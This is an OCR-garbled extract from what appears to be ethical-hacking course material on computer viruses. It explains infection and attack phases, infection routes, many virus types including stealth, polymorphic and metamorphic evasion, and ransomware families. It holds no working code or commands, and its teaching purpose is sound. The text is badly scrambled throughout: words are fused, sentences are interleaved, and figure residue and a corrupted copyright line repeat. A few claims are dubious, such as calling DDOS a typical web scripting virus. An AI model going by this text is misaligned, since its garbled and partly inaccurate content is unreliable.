the execution of infectedprograms,
because it
is triggered and
becomes
the programcodeleadsto the virus code. active upon

Thetwo
©
most
important
of factors
the
infection
phase
Method infection
of
virus
follows: in a are as

©
of
Method spreading
i n the following
virus infectsa system sequence:
©. Thevirus loadsitselfinto memory andchecksfor an executableon thedisk.
0 Thevirus appends
maliciouscodeto a legitimate
programwithout the permission
or
knowledge
of the user.
©. Theuser is unaware of the replacement
andlaunches
the infectedprogram.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Theexecution oftheinfected
programalsoinfects
otherprogramsi n the system,
© The abovecycle
continues until the user realizes
that thereis an anomaly
in the
system.
Apparently,
the user unknowingly and executes the virus
triggers for it to function
Thereare manywaysto execute programs whilethe computer is running.Forexample,
if the user installsany softwaretool, the setupprogramcallsvarious built-in sub:
programsduring extraction. If a virus programalready exists,it can be activatedwith
thistypeof execution, andthe virus can alsoinfectadditionalsetupprograms.
Specificviruses infecti n differentways,suchas

© Afile virus infectsbyattaching application

itselfto an executablesystem program.
Potentialtargetsfor virus infectionsa re as follows:
* Sourcecode
* Batchfiles
© files
Script
>
Boot sectorviruses execute their codebefore
thetarget
PCis booted.
Virusesspread i n a varietyof ways.Thereare virus programsthat infectandkeep
spreading every time the user executes them. Somevirus programs do not infect
programs whenfirstexecuted. Theyresidei n a computer’s
memoryandinfectprograms
later.Suchvirus programs wait for a specified triggerevent to spreadat a later stage.
Therefore, it is difficultto recognizewhichevent mighttriggerthe execution of a
dormantvirus. Asillustratedi n the figurebelow, the.€XE header,
file’s whentriggered,
executesandstartsrunningthe application. Oncethisfile is infected,
anytriggerevent
from the file'sheadercan activate the virus codealong with the applicationprogram
immediately after
executing it.

Themost popular
©
methods
a of are
as
follows:
bywhicha virus spreads
Infectedfiles:Avirus can infect varietyfiles,
© File-sharing
unsuspecting of
services: A virus can takeadvantage
usersopentheinfected
file servers to infectfiles.When
files,their machines alsobecomeinfected.
DVDsandother storagemedia:Wheninfected flash
storagemediasuchas DVDs,
drives,
and portable
harddisksare insertedinto a cleansystem,
the system
gets
infected,
Maliciousattachmentsand downloads:A virus spreads
if a maliciousattachment
opened
sent via emailis or whenappsare downloadedfromuntrustedsources.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Before
Infection
After
Infection

-EXEFile File
-EXE

File
Header
iP

{Virus
Jump°°"
Infected
File

AttackPhase
(Once viruses spread throughout the targetsystem, theystart corrupting the filesand
of
programsthe hostsystem.
afterthe triggering
Someviruses can triggerandcorrupt
event is activated.Someviruses havebugs
the hostsystem
that replicate
only
themselves
and perform
activities
their targets
suchas deleting
onlyafterspreading
filesand increasing
session time. Virusescorrupt
as intendedbytheir developers,

perform
Mostviruses that attacktargetsystems the following
actions:
©. slowing
Deletefilesandalterthe content of datafiles, downthe system
> such as playing
Performtasksnot relatedto applications, music and creating
animations

Unfragmented
File Before Attack

File Fragmented
Due to Virus Attack
Page:3Page:1
File:B File:B | Page:3
LyA
File:
Page:2Page:2
A
File:

Figure7.35:
AttackPhase
Thefigure showstwo files,
A andB, Beforethe attack,
the two filesare locatedone after
the otherin an orderly
manner. Oncea virus codeinfectsthe file,i t alterstheposition
of

ical andCountermensores
Mackin ©by E-Comel
Copyright
 leading
thefilesplacedconsecutively, i n fileallocations
to inaccuracy andcausingthe
systemto slowdownas the user tries to retrieve the files.
In the attackphase:
© Virusesexecute upon
‘Some
triggering
specific events
via built-in bug
viruses execute andcorrupt after being
programs storedin the
host’s
memory
The latestandmost advancedviruses concealtheirpresence, attacking
onlyafter
thoroughlyspreading
through
the host.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Howdoesa GetInfectedbyViruses?
Computer

UD "Not
rrerrecivenccicemesoone the
running
lates
antvus
appltion

Oneninginected
ataciments
crete
GB mstciou
ema oni ds

patedstare
Installing Using media
portable

No
updating
installing
versions
ad
BD
nt new
cemecinetounuednewos

How doesa Computer GetInfectedbyViruses?

Toinfect system,
a first, virus hasto enter it. Oncethe user downloadsandinstallsthe virus
a
fromany source andi n any form,it replicates itselfto other programs.Then,
the virus can
infectthe computer in various ways,some of whichare listedbelow:
Downloads: Attackersincorporate viruses i n popular softwareprogramsand upload
themto websitesintendedfor download. Whena user unknowingly downloads this
infectedsoftwareandinstallsit, the system is infected

Emailattachments:Attackersusually sendvirus-infectedfilesas emailattachments

to
spread the virus on the victim’s
system.When the victim opens the malicious
attachment,the virus automatically
infectsthe system.
Piratedsoftware:Installing crackedversions of software(0S, Adobe, Microsoft
Office,
etc.)mightinfectthe systemas theymaycontain viruses.
Failing
to install security
software:Withthe increase i n security attackers
parameters,
are designing or regularly
to installthe latestantivirus software
new viruses. Failing
update it may exposethe computer system to virus attacks.
Updating
software:If patches
are not regularly
installedwhen releasedbyvendors,
viruses might vulnerabilities,
exploit thereby
allowing
an attackerto accessthe system,
Browser:Bydefault, every browsercomes with built-in security. An incorrectly
configured
browser couldresulti n the automatic runningof scripts,
whichmay,i n turn,
allow
virusesto enter the system
Firewall:Disablingthefirewallwill compromise the security
of networktrafficandinvite
viruses to infect
the system.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Whenthe user clicksany suspiciouspop-up by mistake,the virus hidden
Pop-ups:
behindthe pop-up enters the system.
Wheneverthe user turns on the system,
the
virus
installed codewill run i n thebackground.
Removablemedia:Whena healthy
systemis associated
with virus-infectedremovable
media(e.g,,
CO/DVD,USBdrive,
cardreader), virus
Networkaccess: Connecting
a file sharing
to an untrusted
thespreads
the system.
Wi-Fi network, leaving BluetoothON,or
permitting program that is accessed openly will allow a virus to take over
thedevice.
Backup and restore: Taking a backup of an infectedfileandrestoring i t to a system
infectsthe system again with the same virus.
Maliciousonlineads:Attackerspostmaliciousonlineadsbyembedding maliciouscode
in the ads,alsoknownas malvertising. Onceusers clicktheseads,their computers get
infected,
SocialMedia:Peopletendto clickon socialmediasites,including
maliciouslinksshared
bytheir contacts,
whichcan infecttheir systems.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ofViruses
Types

exampleand
(© according
Vieusesare categories to thelrfunctioning targets
(©Some
ofthe includes
or BootSectorViews
‘Sjstem Polymorphic
Vius WebSeptng
vies

Fe andMutipactite
Views Views
Metamorphic EmailandArmoredVieus

Macroand
Guster
Vis
Stealth/Tuneling
Views
FleoF Cavity
‘overwriting

Companion/Cameutlge
Views
Vis ‘Add-on
an intrusive
Virus

DieetActionor TransientVitus

nfctor
Sparse vies FATandLogie
Bomb
Virus

of Viruses
‘Types
Computer
viruses are malicioussoftwareprograms written byattackersto gain unauthorized
accessto a targetsystem. Thus, theycompromisethe security of the systemas well as its
performance. Forany virus to corrupt a system, it hasto firstassociateits codewith executable
code.
to understand
It is important howviruses:
=
Addthemselves to the targethost'scode
=
Chooseto act upon the targetsystem.
Viruses are categories according to their functioning and targets. Some of the most common
typesofcomputer viruses that adversely affectthe security of systems are listedbelow:

System
or BootSector
Virus

File Virus

Multipartite Virus
MacroVirus

Cluster Virus

Encryption Virus
Stealth/Tunneling
Virus
InfectorVirus
Sparse
Polymorphic
Virus

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Virus
10,Metamorphic

Cavity
11.Overwriting
Fileor Virus
12.
13.
Companion
Virus/Camouflage
Shell
Virus
Virus

14.FileExtension
Virus
15.FATVirus
16.Logic
Bomb
Virus
17.
18.
Web
Email
Virus
Virus
Scripting

19.
Armored
20.Add-on
Virus

Virus
21.
Intrusive
Virus
or
22, DirectAction Transient Virus
23. TerminateandStay
Resident
Virus(TSR)
‘System
or BootSectorViruses
‘The
most common targetsfor a virus are the system sectors,whichincludethe master boot
record(MBR) andthe 00S boot recordsystem sectors. An OSexecutes code i n theseareas
whilebooting, Every diskhassomesort of system
becauseif the MBR is corrupted,
sector.
MBRs
most
are the virus-pronezones
all datawill be lost.TheDOSboot sector alsoexecutes during
systembooting,
of for
Thisis a crucialpoint attack viruses.
Thesystemsector consistsof only512 bytes of diskspace. Therefore, systemsector viruses
concealtheir code in some other disk space.The primarycarriers of systemor boot sector
viruses are email attachmentsand removablemedia (USB drives). Suchviruses reside in
memory.Some sector viruses also spread through infected files;these are known as
multipartite
viruses.
A boot sector virus moves MBRto anotherlocationon the harddiskand copies itself to the
original locationof MBR. Whenthe systemboots,
first,the virus codeexecutes and then
passes
control
MBR.
to the original

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Before Infection

e | |
<——mer———>

After Infection

om = Views
Code—>
|
<—— msr——>

VirusRemoval
736:Working
Figure of systom
and
boot
vius
sector

System
sector viruses create the illusionthatthere is no virus on the system.Oneway to
dealwiththisvirus is to avoidthe use ofthe WindowsOSandswitchto Linuxor Mac,
becauseWindowsis more prone to suchattacks.Linux and Macintoshhavebuilt-in
safeguards againsttheseviruses. Theotherapproach
for protection is to periodically
perform
antivirus checks.
FileViruses
or interpreted
Fileviruses infectfilesexecuted i n the system,
suchas COM,EXE,
SYS,
OVL,OBJ,
PRG,
MNU,
and BATfiles.Fileviruses can be direct-action(non-resident)
or memory-resident

Fileviruses insert theircodeinto the original file and infectexecutable files.Suchviruses are
numerous, albeit rare. They infect i n a varietyof ways and are found i n numerous file types.
Themostcommon typeof file virus operatesbyidentifying the file typeit can infectmost
easily,suchas
executesalong that with filenamesending i n COMor .EXE. During
with programfilesto infectm ore files.Overwriting
programexecution, the virus
a virus is not easy,as the
overwritten programs
Beforeinserting
no longer
function
some
their codeinto a program,
allowthe original
properly. Theseviruses tendto befound immediately.
file viruses save the original
programto execute,so that everything appearsnormal,
instructions and

Fileviruses hidetheir presenceusing stealthtechniques

to residei n a computer’s
memory i n
the same way as systemsector viruses. They do not showany increase i n file length while
performingdirectory
listing.
If a user attemptsto readthe file,the virus intercepts the request,
andtheuser getsbackhisoriginal
of infectiontechniques
exist.
file.File
viruses
can infectmanyfiletypes, a s a wide variety

BK> SRI
Figure7.37:
Working
gaANS
of file
vires

ical andCountermensores
Mackin ©by E-Comel
Copyright
Multipartite
Viruses
A multipartite knownas a multipart
virus (also virus or hybrid
file infectorsandboot recordinfectorsand attemptsto simultaneously the
virus)combines approach
attackboth the boot
sector andthe executableor programfiles.Whenthe virus infectsthe boot sector,
of

it will,i n
turn, affectthesystemfilesandvice versa. Thistypeof virus re-infectsa systemrepeatedly ifit
is not rooted out entirelyfrom the targetmachine.Someexamples of multipartite viruses
include
Invader,
Flip,
Macro Viruses
Tequila,
and

Macro viruses infectsMicrosoftWordor similarapplications byautomatically performing a

an application.
sequenceof actions aftertriggering Most macro viruses are written usingthe
macro language VisualBasicfor Applications(VBA),
and theyinfect templates or convert
infecteddocumentsinto template files while maintainingtheir appearanceof common
documentfiles.
Macroviruses are somewhat lessharmfulthanotherviruses. They usually spreadvia email
Puredatafilesdo not allowthe spreading
the extensive macro languages of
viruses,but sometimes,the average user, due to
usedi n some programs,easily overlooks
data file and an executablefile. In most cases,just to makethings
the line betweena
easyfor users, the line
betweena datafile and a programstartsto blur only whenthe default macros are set to run
automatically everytime the data file is loaded.Viruswriters can exploituniversalprograms
with macro capability, suchas MicrosoftWord,Excel, and other Officeprograms.Windows
Help
files macro
code.
can alsocontain

Â¥ mim (N
Infects
Macro Enabled
D ocuments

7.38:Working
Figure ofa macro virus

ClusterViruses
Clusterviruses infectfileswithout changing the file or planting additionalfiles.Theysave the
virus codeto the harddriveandoverwrite thepointeri n the directory entry, directing
thedisk
read pointto the virus codeinsteadof the actualprogram.Eventhough the changes in the

directory
entry mayaffectall the programs,
A clustervirus, e.g., Dir-2,
of
onlyone copy the virus existson the disk
first launchesitself when any programstarts on the computer
system, andcontrolis thenpassed to the actualprogram.

This
virus infectionleadsto severe problems
infectsmemory,it controlsaccessto thedirectory
if the victim doesnot knowits exact location.If it
structure on thedisk
If the victim bootsfrom a cleanfloppy diskandthen runs a utilitysuchas CHKDSK, the utility
reportsa serious problem with the cross-linked file on the disk.Suchutilities usually
offerto
correct the problem. Ifthe offer is accepted, the virus infectsall the executablefilesandresults
of
in the loss original
all
content,or
files to same
size.
mightappear be ofthe

7
Module Page921
© ical andCountermensores
Mackin Copyright
by E-Comel
StealthViruses/Tunneling Viruses
Theseviruses tryto hidefromantivirus programsbyactively altering andcorrupting
the service
callinterruptswhile running.Thevirus code replaces the requests to performoperationswith
respectto these service call interrupts.
Theseviruses state falseinformationto hide their
presencefrom antivirus programs.For example, a stealthvirus hidesthe operationsthat it
modifiedandgivesfalserepresentations. Thus,i t takesover portionsof the targetsystemand
hides
its
viruscode.

placing
byhiding
Astealthvirus hidesfromantivirus software
a copyof itself in some other system
theoriginal
drive,thus replacing
Uninfectedfile that is storedon the harddrive,
of
size the fileor temporarily
the infectedfile with the

Inaddition, performed
a stealthvirus hidesthe modifications byit. It takescontrolof the
system's
functionsthat read files or systemsectors. When another program requests
thathasalready
information modifiedbythe virus, thestealthvirus reportsthatinformation
to
the requesting
program instead,Thisvirus alsoresidesi n memory.
To avoiddetection,
theseviruses always takeover system functionsanduse themto hidetheir
presence
Oneof the carriers of stealthviruses is the rootkit. Installing
a rootkit resultsin sucha virus
attackbecausea Trojan installsthe
rootkit
andcapable
of
is thus hidinganymalware.

AntivirusSoftware
a

Original
TCPIASYS
7.39:Working
Figure ius/tunneling
ofstealth us
=
VirusRemoval
© perform
Always a coldboot (boot
fromwrite-protected
CDor DVD)
© Neveruse DOScommands
suchas FDISK
to fix the virus
(©.

Encryption
Use
antivirus
software
Viruses
Encryption viruses or cryptolocker the targetsystem
viruses penetrate via freeware,
shareware,
codecs, fakeadvertisements, torrents,emailspam, andso on. Thistypeof virus consistsof an
encrypted copyofthevirus anda decryption module. Thedecryption moduleremains constant,

aof
whereasthe encryption makesuse different keys.
encryption
‘An keyconsists of decryption moduleand a n encrypted copyof the code,which
enciphers the virus. Whenthe attackerinjectsthe virus into the targetmachine, the decryptor
will first execute and decrypt the virus body.Then, the virus body executes and replicates
or

ical andCountermensores
Mackin ©by E-Comel
Copyright
becomes residentin the targetmachine,Thereplication processi s successfully
accomplished
usingthe encryptor.Eachvirus-infectedfile uses a different keyfor encryption.
Theseviruses
employ XORon eachbytewith a randomized key, Thedecryption technique employed
is “x,―
or
eachbytewith a randomized
keyis generated
andsavedbythe root virus.
viruses blockaccess
Encryption to target or provide
machines victims with limitedaccess to the
They
system, to hidefrom virus scanners. Thevirus scanner cannot detectthe
use encryption
encryption but it can detectthe decrypting
virus usingsignatures, module,

Encryption
Encryption
key1 Virus 2

Encryption
key2

VirusCode
Encryption
key3 Encryption
Virus3
740: Working
Figure of ener
InfectorViruses,
Sparse
To spread infection,viruses typically
attemptto hidefromantivirus programs.Sparse infector
viruses infectlessoften and tryto minimize their probability
of discovery.
Theseviruses infect
onlyoccasionally uponsatisfyingcertain conditionsor infectonlythosefileswhoselengths fall
withina narrow range.
‘Thesparseinfectorvirus workswith two approaches:
*
Replicates
onlyoccasionally
of the week)
(e.g., every tenth programexecutedor on a particular
day

Determines whichfile to infectbasedon certain conditions(e.g,infectstargetfileswith

maximum size of 128kb)
‘a

belowshowtheworking
Thediagram ofa sparseinfector
virus.
attackersendsa sparseinfectorvirus to the targetmachineand setsa wakeup
‘The callfor the
virus to execute on the 15thday
of everymonth.Thisstrategy makesit difficultfor the antivirus
programto detectthe virus, thusallowing the virus to infectthe targetmachinesuccessfully

Wakeup on 15*of
every monthandexecutecode

Figure
741: of sparseinfctor virus
Working

ical andCountermensores
Mackin ©by E-Comel
Copyright
Polymorphic
Viruses
Suchviruses infecta file with an encrypted copyof a polymorphiccodealready decodedbya
decryptionmodule, Polymorphic viruses modifytheir codefor each replication to avoid
detection,They accomplish this bychanging the encryption moduleand the instruction
sequence.Polymorphic mechanisms use randomnumbergenerators i n their implementation.

Thegeneral use of the mutation engineis to enable polymorphiccode.Themutator provides a

sequence of instructions that a virus scanner can use to optimize an appropriate detection
Slowpolymorphic
algorithm. codeprevents antivirus professionals
from accessingthecode.A
simple
integrity
A polymorphic
checkerdetectsthe presence
a
of polymorphic
virus consistsof three components:
virus in the system's
the encrypted virus code,
disk.
the decryptor
routine,andthe mutation engine.Thefunction ofthedecryptor routine is to decryptthevirus
code.It decrypts the code onlyafter taking controlof the computer. The mutation engine
generates randomized decryption decryption
routines. Such routines vary whenever the virus
infectsa new program.
Thepolymorphic virus encrypts boththe mutation engineandthe virus code.Whenthe user
executesa polymorphic-virus-infected program,the decryptor routine takescomplete control
of the system, after which it decrypts the virus codeand the mutation engine. Next,the
decryption routine transfers the systemcontrolof thevirus, whichlocatesa new programto
infect.In the RandomAccess
mutation engine.Then,
randomized decryption
Memory (RAM),
routine,whichcan decrypt
the virus makesa replica
the virus instructs the encrypted as
of itself well as the
mutation engineto generate
the virus. Here, the virus encrypts
a new
the new
copiesof boththe virus codeandthe mutationengine.Thus, thisvirus, along withthe newly
encrypted virus codeand encrypted mutation engine (EME), appends the new decryption
routine to a new program, thereby
Polymorphic running targetsystems
viruses on
the
continuingprocess.
are difficultto detectdueto the encryption of
the virus body andthe changes i n the decryption routine eachtime theseviruses infect.It is
difficultforvirus scannersto identify
theseviruses, as no two infections
lookalike

e
i.
_=
> mantener)
newt

ical andCountermensores
Mackin ©by E-Comel
Copyright
Metamorphic Viruses
Metamorphic viruses are programmed suchthat theyrewrite themselves completelyeachtime
theyinfecta new executablefile. Suchviruses are sophisticated and use metamorphic engines
for
their
execution.
code
of but
with
Metamorphic reprogramsitself.Itstranslated into
new variant the same virus
code,Thistechnique,
different code)
in whichthe originalalgorithm
temporary code(a
andthenconvertedbackinto the original
r emains intact,is usedto avoid pattern
recognitionbyantivirus software.Metamorphic viruses are more effectivethan polymorphic
viruses.
of virus bodiesrangesfromsimple
Thetransformation to complex, depending
on the technique
used.Sometechniques usedfor metamorphosing viruses are as follows:

=
Disassembler
=
Expander
=
Permutator
=
Assembler

Virus
bodies
are
transformed
following
steps:
1, Insertsdeadcode
in the

Reshapes
2.
expressions
Reorders
3,
instructions
Modifiesvariablenames
programcode
Encrypts
Modifiesprogramcontrolstructure

[EGG --~> gine

This
diagram
depicts
metamerphic
malware
metamorphic
variants
wit
Commonly
knownmetamorphic
virus 743:Working
Figure
virusesare as follows:
of metamorphic

=
Win32/simile
Theintruder programsthis virus i n assembly
language to targetMicrosoftWindows.
i s complicated
Thisprocess andgenerates almost90%of the virus code.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
zmist
ZmistIs alsoknownas Zombie.Mistfall was the first virus to use the technique
called
integration.―
“code Thiscode inserts itself into other code,regenerates the code,
and
rebuildstheexecutable,
Overwriting
Fileor Cavity
Viruses
Some programshave emptyspaces i n them. Cavity
viruses, also known as space fillers,
overwrite a partof the hostfilewitha constant (usuallynulls),
without increasing thelength of
the file while preservingits functionality.
Maintaininga constant file size wheninfecting
allows
the virus to avoiddetection. viruses are rarely
Cavity founddue to the unavailabilityof hosts
andcodecomplexity.
‘A
new designof a Windowsfile,calledthe PortableExecutable(PE), improvesthe loading
speedof programs.However, it leavesa particular gap in the file while itis beingexecuted,
which can be usedbythe cavityvirus to insert itself.The most popular virus family
i n this
is theCIHvirus{known
category as Chernobyl
or Spacefiller).

Contenti n the filebeforeinfection Contentinthe fileafterinfection

Sales

and
a nd
leading
marketingmanagement
for
authority
marketing
the
enseutives
m anagementindustries
is
inthe sales
Wald peal wall pea) wail we) boll

Thesuspect,
Desmond Tuer, surrendered froth
peal
mult
gall met geal a

ph
Figure
744 Woking
ofoverwrtngfeor
cavityvis

Companion/Camouflage Viruses
‘Thecompanionvirus stores itselfwith the same filenameas the target programfile, Thevirus
infectsthe computer uponexecuting the file,and it modifiesthe harddiskdata.Companion
viruses use DOSto run COMfilesbeforethe execution of EXEfiles.Thevirus installsan identical
COMfileandinfects EXEfiles.
is what happens.
‘This Suppose that a companionvirus is executing on the PCanddecidesthat it
is time to infecta file. It looksaroundand happens to find a file callednotepad.exe. It now
creates a file callednotepad.com, containing the virus. Thevirus usually plantsthisfile in the
same directory as the .exe file;however, it can alsoplace it i n anydirectory
on the DOSpath. If
you typenotepad and pressEnter, DOSexecutes notepad.com insteadof notepad.exe (in
sequence, DOS
willexecuteCOM,
are all in the same directory).
andexecutes notepad.exe.
EXE,
then andthen BATfileswiththe same root
Thevirus executes,possibly
Theuser wouldprobably
infectingmore files,
if they
andthenloads
fail to notice that something is wrong.It is
name,
easyto detecta companion
virus
justbythe presenceoftheextra COMfilein the system,
ical andCountermensores ©
Mackin by E-Comel
Copyright
 Viewinfects
thesystem
withafle
roteped.com
andsaves tin

attacker 745:Working
Figure
Notepad.exe
of companionvis! camoufge
vrs
Notepad.com

ShellViruses
hostprogram’s
Theshellvirus codeformsa shellaroundthe target code,makingitselfthe
original
programwiththe hostcodeas its sub-routine,Nearly
allbootprogramvirusesare shell

Before Infection
. Hat
<— Oiignal
regen —>
|
After Infection

Ca
FileExtensionViruses
Vin Coe
—
> a <— orgieal
Progen—>

Fileextension viruses change the extensionsof files.Theextension .TXTis safeas it indicatesa

will onlysee BAD.TXT. If you haveforgotten

this is a text file andopen it. It actually
a
puretext file. With extensionsturned off,if someone sendsyou file namedBAD.TXT.VBS,
that extensionsare turnedoff, you might
is an executable Visual BasicScript
you
thinkthat
virus file andcould
causesevere
Theguidelines
damage.
to secure filesagainst
suchvirus infectionare as follows:
=
Turn off “Hide i n Windows(Go
file extensions― to ControlPanel-> Appearance
and
Personalization
> Showhiddenfilesandfolders> View tab > UncheckHide
extensionsfor knownfile types}.
Scanall the filesi n the system
usingrobustantivirus software;
this requiresa substantial
‘amount
of
time.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 testhe
Oasiste Ratin
ten 2 tee

(Fie
coc
doses

7.47:Screenshotdisplaying
Figure Options Window
Folder

FATViruses
A FATvirus is a computer
virus that attackstheFileAllocation Table(FAT),a system usedi n
Microsoftproducts and some other typesof computer systems to access the information
storedon a computer. Byattacking the FAT,a virus can cause severe damage to a computer.
FATviruses can workin a varietyof ways.Someare designed to embedthemselves into filesso
that whenthe FATaccessesthefile,the virus is triggered. Othersmayattackthe FATdirectly.
Manyare designed to overwrite files or directories,and materialon a computer can lost
permanently. If a FAT virus is sufficientlypowerful,it can rendera computer unusablei n
additionto destroyingdata,forcing a user to reformatthe computer.

Essentially, the index,thereby

a FATvirus destroys making it impossible for a computer to
locatefiles.Thevirus can spread
to fileswhentheFAT attempts to accessthem, corrupting the
entire computer eventually.
FATviruses often manifesti n the formof corrupted files,with
Users The FAT architecture itselfcan also be
notingthat files are missingor inaccessible.
changed; that shouldbe usingthe FAT32protocol
e.g.,a computer mightabruptly
saythat it is
usingFATI2.

ical andCountermensores
Mackin ©by E-Comel
Copyright
LogicBombViruses
logicbombis a virus that is triggered
‘A bya responseto an event,suchas the launching of an
application
or when a specific is reached,
date/time where it involveslogicto execute the
trigger.
For example,
cyber-criminals
use spyware to covertly
installa keylogger The
on your computer.
keylogger
can capturekeystrokes,
suchas usernames and passwords.
The logicbombis
designedto wait until you visit a websitethat requires you to logi n with your credentials,such
as a bankingsite or socialnetwork.Consequently, the logicbombwill be triggered to execute
the keylogger,
capture yourcredentials, andsendthemto a remote attacker.
Whena logicbomb is programmed to execute on a specific date,i t is referredto as a time
bomb.Timebombsare usually
programmed
to set offwhenimportant
datesare reached,
such
as

WebScripting
and Day.
ChristmasValentine’s
Viruses
web scripting
‘A virus is a typeof computersecurity vulnerability
that breaches your web
browsersecurity through a website.Thisallowsattackersto injectclient-sidescripting
into the
page.It can bypass
‘web access controlsand stealinformationfrom the webbrowser. Web
scriptingviruses are usuallyusedto attacksiteswith large populations,
suchas sites for social
networking, user reviews, andemail.Webscripting viruses can propagate slightly
fasterthan
other viruses. A typicalversion of web scripting
viruses is DDOS. It hasthe potential to send
spam,damage data, anddefraudusers.
Thereare two typesof webscripting viruses: non-persistentandpersistent. Non-persistent
viruses attackyou without your knowledge.
In the case of a persistent
virus,your cookiesare
directly stolen,andthe attacker can hijack your session, whichallowsthe attackerto
impersonate you andcausesevere damage.
Prevention
Thebestways to preventtheseviruses and exploits are bysafely validatinguntrusted
HTMLinputs,enforcing cookiesecurity, disabling
scripts, and usingscanningservices
suchas an antivirus programwith real-timeprotection for your webbrowser.It is also
beneficial
to avoid unknown websitesand use Worldof Trustto ensure that a site is
safe.You wouldnotice if you are infectedwith a web scriptingvirus if your searchesare
linkedelsewhere
and sluggishly,
andthe background or homepage
and programs maycloserandomly.
suchasAdBlocker
changes.
Modern-day
Plus,whichallowusersto preventscripts
Thecomputer runs slowly
browsershaveadd-ons
frombeing loaded.
E-mailViruses
‘An
e-mailvirus refersto computercodesent to you as a n e-mailattachment,whichif activated,
will resulti n some unexpectedand usually harmfuleffects, suchas destroying
specific fileson
your harddiskand causingthe attachmentto be emailedto everyonein your addressbook.
Emailviruses perform a widevariety pop-upsto crashing
of activities,from creating systems or
stealing personal data.Suchviruses alsovaryin terms of how theyare presented.Forexample,
a senderof an emailvirus may be unknownto a user, or a subject line maybe filled with

ical andCountermensores
Mackin ©by E-Comel
Copyright
nonsense. In othercases,a maycleverly
hacker an emailto appearas if it is froma
disguise
trustedor knownsender,
To avoid emailvirus attacks,you shouldnever open(ordouble-click on)a n e-mailattachment
unlessyou knowwho sent it andwhatthe attachmentcontains;i n addition, you must install
anduse antivirus softwareto scan anyattachmentbeforeyou openit.
Armored
Viruses
viruses are viruses that are designed
Armored to confuse
or trick deployed
antivirus systems
to

prevent
showing
detecting
themfrom the actualsource of the infection.Theseviruses makeit difficult
forantivirus programsto trace the actualsource oftheattack.They
some otherlocationeven though theyare actually
trickantivirus programsby
on the system itself.
‘The
basic
following techniques
Anti-disassembly
=
adoptedare byarmoredviruses

Anti-disassembly
produce
is a technique
that usesspecially
an incorrect programlistingbydisassembly
analysis
tools. or
craftedcode data in a programto

Anti-debugging
Anti-debugging
techniques
the debugger.
prevented
are usedto ensure that the programis not runningunder
Thiscan slowdownthe process of reverse engineering, but it cannot be

Anti-heuristics
‘Anti-heuristics codeto preventheuristicanalysis,
are usedi n machine andtheyrelyon
theprogram's ability
Anti-emulation
itself
to protect fromprogrammer anddebugger intervention.

Anti-emulationtechniques are used to avoid dynamicanalysisbyfingerprinting

the
emulatedsystem environment; theycan also secure intellectual propertyagainst
‘emulation-assisted
reverse engineering

Anti-goat
Anti-goat techniquesuse heuristicrulesto detectpossible goatfilessuchas a virus that
cannot infecta file if it is too smallor if it contains a large amount of do-nothing
instructions.Anti-goatviruses require more time for analysis.

‘Add-on
Viruses
viruses append
‘Add-on theircodeto the hostcodewithout making
anychanges
to the latter or
relocatethehostcodeto insert theircodeat the beginning,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 748: Working
Figure of add-on
veus

Intrusive Viruses
Intrusiveviruses overwrite the hostcodecompletely
or partly
with theviralcode.

I Original
Program]
a
DirectActionor TransientViruses
749:Working
Figure eo |
af intrusivevis

Direct
actionviruses
Virus is directly
all of
or transient
the
proportional
transfer controls hostcodeto whereit residesin the
memory.It selectsthe targetprogramto be modifiedand corrupts
to thelife of its host.Therefore,
it. Thelife of a transient
transient virus executesonlyupon
the execution of its attachedprogramand terminates upon the termination of its attached
program.At the time of execution,the virus may spread to otherprograms.Thisvirus is
transient or direct,
as it operates onlyfor a shortperiodand goesdirectly to the diskto search
forprograms
to
infect.
Resident(TSR)
TerminateandStay Viruses
A terminate andstayresident(TSR) virus remains permanently in the targetmachine’s
memory
duringa n entire work session,even afterthe target host’s
programis executedandterminated.
The TSRvirus remains in memoryand thereforehas some control over the processes. In
general, the TSRvirus incorporatesinterruptvectors into its codeso that when an interrupt
occurs,the vector directsexecution to the TSRcode.If the TSRvirus infectsthe system, the
User needsto rebootthe system to remove the virus without a trace.

following
‘The steps
are employed
byTSRviruses to infectfiles:
Gets

‘=
control
of the system
a portionofmemory
Assigns for its code
‘=
Transfers
andactivates itselfi n theallocated
portionofmemory
Hooksthe execution ofcodeflowto itself
to infectfiles
Startsreplicating

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ;
Ransomware CEH
is malware
\@Ransomware
sytem’
ceator(s)
typeof malware that restricts access to thecompute
onlineransom payment
‘an tothe
filesandfoldersa nddemands
to remove the restrictions

Dharma
‘Dharma
a eal Families .
Ransomware
© crter

though
tims ema

forthedecryption
service eterna

5) —— ————
Ransomware (Cont'd)
‘oa aretha
pceaty ‘i

cnoraix |
Somes ||qusiorennioinetienssencypeon――
Samfam | crsSegesn anes

Ransomware
Ransomware is a typeof malwarethat restricts accessto the infected
computer systemor
criticalfilesanddocumentsstoredon it, andthen demandsa n onlineransom paymentto the
malware creator(s) might
to remove user restrictions. Ransomware encrypt filesstoredon the
disk
systern’s
paying
hard
the ransom.
or merelylockthe system anddisplay
messagesmeant to
trick
the user into

ical andCountermensores
Mackin ©by E-Comel
Copyright
Usually,
ransomware spreads as a Trojan,
entering
a systemthrough emailattachments, hacked
websites,
infectedprograms, app downloadsfrom untrustedsites,vulnerabilitiesi n network
services, andso on. Afterexecution, the payload
in the ransomware runs andencrypts
the
victim'sdata (filesand documents), whichcan be decrypted onlybythe malwareauthor.In
some cases,u ser interaction is restrictedusinga simplepayload.
In a web browser, a text file or webpagedisplays the ransomware demands.The displayed
messages appearto befromcompaniesor lawenforcementpersonnel claiming
falsely that the
victim'ssystem is being usedforillegalpurposesor contains illegal content (e.g.,
pornvideos,
pirated software), or it couldbe a Microsoftproduct activation notice falselyclaiming
that
installedOfficesoftwareis fakeandrequiresproduct re-activation. Thesemessages entice
victims into paying money to undothe restrictions imposed on them.Ransomware leverages
Victims’
fear,trust,surprise,andembarrassment to getthemto paytheransom demanded,
Ransomware Families
Someadditionalransomware familiesare as follows:
=
Cerber
=
CTB-Locker
=
Sodinokibi
=
BitPaymer
CryptXXX
CryptorBit
CryptoLocker
CryptoDefense
=
CryptoWall
*
Police-themed
Ransomware
